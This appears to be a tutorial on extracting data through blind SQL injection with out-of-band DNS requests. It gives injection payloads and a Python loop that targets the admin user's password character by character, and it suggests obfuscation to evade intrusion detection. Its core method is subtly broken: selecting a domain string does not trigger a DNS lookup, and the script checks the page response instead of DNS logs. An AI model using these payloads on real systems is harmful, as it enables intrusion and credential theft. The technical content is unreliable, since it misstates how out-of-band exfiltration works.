OOB DNS Injection Guide

TL;DR

This guide shows how to exploit Blind SQL Injection vulnerabilities using Out-of-Band (OOB) DNS requests for data exfiltration. We’ll use a simple Python script and common tools like dig or nslookup to detect the responses.

What is OOB DNS Exfiltration?

Blind SQL Injection means you can send queries to a database, but don’t see the results directly in the web application. OOB (Out-of-Band) techniques let us get data back indirectly. In this case, we make the database server perform a DNS lookup with a name that includes our stolen data. We then monitor for those DNS requests on our own server.

Prerequisites

• A vulnerable web application susceptible to Blind SQL Injection
• A domain you control (e.g., yourdomain.com)
• A Python environment (version 3 recommended)
• Basic command-line skills

Step-by-Step Guide

1. Set up a DNS Listener
   • You need a way to see DNS requests. You can use tools like tcpdump, or set up a simple DNS server on your machine (not covered here). For simplicity, we’ll assume you have access to DNS logs for your domain.
   • Ensure your firewall allows incoming DNS queries on port 53.
2. Craft the Payload

   The core idea is to inject SQL code that causes a DNS lookup when executed by the database server.

   SELECT CASE WHEN (1=1) THEN 'yourdomain.com' ELSE '' END;

   This simple example will cause a DNS request for yourdomain.com if the condition (1=1) is true. We’ll expand this to include data.

3. Injecting into the Vulnerable Parameter

   Identify a parameter in the web application that’s vulnerable to SQL Injection. This usually involves trying different inputs and looking for errors or unexpected behaviour.

   Modify your request to include the payload. For example, if the vulnerable parameter is called id:

   http://example.com/page?id=1 UNION SELECT CASE WHEN (1=1) THEN 'yourdomain.com' ELSE '' END; -- -

   The UNION SELECT part allows us to add our query alongside the original one. The comment -- - is used to remove any trailing parts of the original query that might cause errors.

4. Exfiltrating Data (Character by Character)

   We’ll extract data character-by-character using a loop and the SUBSTRING() function. This is slow, but reliable.

   SELECT CASE WHEN SUBSTRING((SELECT password FROM users WHERE username = 'admin'), 1, 1) = 'a' THEN 'yourdomain.com' ELSE '' END;

   This query checks if the first character of the admin user’s password is ‘a’. If it is, a DNS request for yourdomain.com will be made.

5. Automating with Python

   Writing a script to automate this process is crucial. Here’s a basic example:

   import requests
   import time
   
   url = 'http://example.com/page?id='
   target_domain = 'yourdomain.com'
   password_length = 10 # Example length
   
   for i in range(1, password_length + 1):
       for char in 'abcdefghijklmnopqrstuvwxyz0123456789':
           payload = f"1 UNION SELECT CASE WHEN SUBSTRING((SELECT password FROM users WHERE username = 'admin'), {i}, 1) = '{char}' THEN '{target_domain}' ELSE '' END; -- -"
           full_url = url + payload
           try:
               response = requests.get(full_url)
               # Check DNS logs for target_domain.  This is the critical step.
               if target_domain in response.text: #Simple check, improve this!
                   print(f"Character {i}: {char}")
                   break
           except Exception as e:
               print(f"Error: {e}")
           time.sleep(1)  # Be polite to the server
   

   Important: Replace http://example.com/page?id=, yourdomain.com and password length with your actual values.

6. Monitoring DNS Logs

   Continuously monitor your DNS logs for requests to yourdomain.com. Each request indicates a successful character match in the SQL query. The characters will be revealed sequentially as you run the script.

   You can use tools like dig or nslookup to manually check if a DNS request was made:

   dig yourdomain.com

Important Considerations

• Rate Limiting: Be mindful of rate limiting on the target server. Add delays to your script (e.g., time.sleep(1)).
• Firewalls and Intrusion Detection Systems: Your requests might be blocked by firewalls or IDS. Consider using techniques like encoding or obfuscation, but these are not guaranteed to work.
• Accuracy of DNS Logs: Ensure your DNS logs are accurate and reliable. False positives can lead to incorrect results.
• Ethical Hacking: Only perform this testing on systems you have explicit permission to assess.